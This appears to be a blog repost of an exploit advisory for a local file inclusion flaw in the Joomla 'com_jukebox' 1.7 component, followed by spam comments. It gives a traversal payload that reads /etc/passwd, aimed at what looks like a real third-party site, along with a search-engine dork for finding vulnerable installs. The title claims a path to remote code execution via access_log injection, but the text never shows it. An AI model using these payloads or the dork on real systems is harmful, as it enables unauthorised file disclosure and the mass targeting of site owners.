LFI to RCE via access_log injection

Joomla Component Juke Box LFI Vuln


[o] Joomla Component Juke Box Local File Inclusion Vulnerability
Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]


[o] PoC
http://www.livequrantutors.com/app/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_jukebox"


Comments

labatterie said…
I hope u answer as soon as u can...
sohail said…
Online Quran Academy: The Best Online Quran Learning Institute. Online Quran Teaching, Quran reading, Quran Tutoring. Quran Academy, EQuran, Online Quran Tut courses